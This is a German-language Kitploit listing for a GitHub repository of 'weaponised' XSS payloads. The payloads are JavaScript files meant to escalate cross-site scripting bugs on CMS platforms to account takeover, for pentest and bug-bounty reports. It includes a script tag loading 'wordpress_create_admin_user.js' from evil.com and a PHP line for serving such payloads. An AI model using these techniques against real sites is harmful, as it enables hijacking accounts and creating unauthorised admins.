Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
Tools/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

Repository anzeigen
1.4k222vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Weaponised XSS Payloads

XSS-Payloads, die dazu entwickelt wurden, aus alert(1) eine P1 zu machen.

Der Blogbeitrag

Dieses Repository wurde zusammen mit einem Blogbeitrag mit dem Titel „How to Upgrade Your XSS Bugs from Medium to Critical“ veröffentlicht: https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Was ist das?

In diesem Repository findest du eine Reihe von JavaScript-Dateien, die in einen XSS-Payload geladen werden können, um im Kontext des Browsers des Opfers sensible Funktionen auf gängigen CMS-Plattformen auszuführen. Das kann helfen, einen einfachen XSS-Bug zu etwas Kritischerem zu verketten, etwa einer Account-Übernahme.

Das ist perfekt, um den Schweregrad eines Pentest- oder Bug-Bounty-Reports zu erhöhen, indem du echte sicherheitsrelevante Auswirkungen demonstrierst.

Payloads werden nach und nach hinzugefügt, sobald ich Zeit habe. Es werden noch viele weitere folgen – wenn du helfen kannst, sind Pull-Requests willkommen! Wenn du nach Inspiration suchst, was du erstellen könntest, wirf einen Blick auf den Reiter „Issues“ in diesem Repository.

So geht's

Der einfachste Weg, diese Payloads zu verwenden, besteht darin, sie irgendwo zu hosten und sie in das src-Attribut eines Script-Tags für deinen XSS-Payload zu laden, etwa so:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternativ kann es – je nach Kontext und Länge des Payloads – manchmal minifiziert, encodiert und dann direkt in die Anfrage eingebunden werden.

Um die JavaScript-Datei zu hosten, musst du möglicherweise den Content-Type auf application/javascript setzen. Um das mit PHP zu erreichen, kannst du einfach diese Zeile an den Anfang eines beliebigen Payloads setzen, sie als .php-Datei speichern und auf deinem PHP-fähigen Webserver hosten:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Danksagungen

Dieser Artikel von Shift8 hat mich dazu inspiriert, dieses Repository zu erstellen. Das JavaScript im Artikel enthält ein paar kleinere Tippfehler, aber die Konzepte sind genau richtig.

Tool herunterladen